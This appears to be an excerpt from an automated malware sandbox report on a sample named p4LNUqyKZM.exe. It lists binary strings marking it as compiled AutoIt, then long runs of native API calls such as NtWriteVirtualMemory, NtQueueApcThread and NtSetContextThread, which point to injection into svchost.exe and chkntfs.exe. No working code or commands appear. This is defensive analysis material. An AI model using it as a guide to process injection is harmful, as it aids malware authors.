            Source: p4LNUqyKZM.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_68058db4-2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C973 NtClose,1_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F4650 NtSuspendThread,LdrInitializeThunk,3_2_044F4650
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F4340 NtSetContextThread,LdrInitializeThunk,3_2_044F4340
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C60 NtCreateKey,LdrInitializeThunk,3_2_044F2C60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_044F2C70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_044F2CA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_044F2D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_044F2D30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_044F2DD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_044F2DF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_044F2EE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_044F2E80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F30 NtCreateSection,LdrInitializeThunk,3_2_044F2F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FE0 NtCreateFile,LdrInitializeThunk,3_2_044F2FE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FB0 NtResumeThread,LdrInitializeThunk,3_2_044F2FB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AD0 NtReadFile,LdrInitializeThunk,3_2_044F2AD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AF0 NtWriteFile,LdrInitializeThunk,3_2_044F2AF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2B60 NtClose,LdrInitializeThunk,3_2_044F2B60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_044F2BE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_044F2BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_044F2BA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F35C0 NtCreateMutant,LdrInitializeThunk,3_2_044F35C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F39B0 NtGetContextThread,LdrInitializeThunk,3_2_044F39B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C00 NtQueryInformationProcess,3_2_044F2C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CC0 NtQueryVirtualMemory,3_2_044F2CC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CF0 NtOpenProcess,3_2_044F2CF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D00 NtSetInformationFile,3_2_044F2D00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DB0 NtEnumerateKey,3_2_044F2DB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2E30 NtWriteVirtualMemory,3_2_044F2E30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2EA0 NtAdjustPrivilegesToken,3_2_044F2EA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F60 NtCreateProcessEx,3_2_044F2F60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F90 NtProtectVirtualMemory,3_2_044F2F90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FA0 NtQuerySection,3_2_044F2FA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AB0 NtWaitForSingleObject,3_2_044F2AB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2B80 NtQueryInformationFile,3_2_044F2B80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3010 NtOpenDirectoryObject,3_2_044F3010
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3090 NtSetValueKey,3_2_044F3090
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3D70 NtOpenThread,3_2_044F3D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3D10 NtOpenProcessToken,3_2_044F3D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E9270 NtCreateFile,3_2_004E9270
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E93E0 NtReadFile,3_2_004E93E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E94D0 NtDeleteFile,3_2_004E94D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E9570 NtClose,3_2_004E9570
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E96D0 NtAllocateVirtualMemory,3_2_004E96D0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_009ED5EB
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009E1201
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009EE8F6
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F20460_2_009F2046
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009880600_2_00988060
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E82980_2_009E8298
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009BE4FF0_2_009BE4FF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B676B0_2_009B676B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A148730_2_00A14873
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ACAA00_2_009ACAA0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0098CAF00_2_0098CAF0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099CC390_2_0099CC39
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B6DD90_2_009B6DD9
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009891C00_2_009891C0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099B1190_2_0099B119
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A13940_2_009A1394
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A17060_2_009A1706
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A781B0_2_009A781B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A19B00_2_009A19B0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009879200_2_00987920
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099997D0_2_0099997D
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A7A4A0_2_009A7A4A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A7CA70_2_009A7CA7
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A1C770_2_009A1C77
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B9EEE0_2_009B9EEE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A0BE440_2_00A0BE44
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A1F320_2_009A1F32
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009636300_2_00963630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188D31_2_004188D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401160
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041010D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410113
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403190
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416A6D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416AAF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410333
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E3B1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E3B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402C44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402C50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EFD3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB9C32
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04572446
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04564420
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0456E4F6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C0535
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04580591
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DC6E0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044E4750
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C0770
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044BC7C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04552000
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04548158
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044B0100
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0455A118
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045781CC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045801AA
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045741A2
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04560274
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045402C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457A352
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044CE3F0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045803E6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C0C00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044B0CF2
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04560CB5
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0455CD1F
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044CAD00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044BADE0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044D8DBF
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C0E59
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457EE26
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457EEDB
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457CE93
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044D2E90
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04534F40
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04562F30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04502F28
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044E0F30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044B2FC8
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0453EFA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044CA840
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C2840
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044EE8F0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044A68B8
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044D6962
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C29A0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0458A9A6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044BEA80
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457AB40
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04576BD7
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044B1460
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457F43F
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04577571
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045895C3
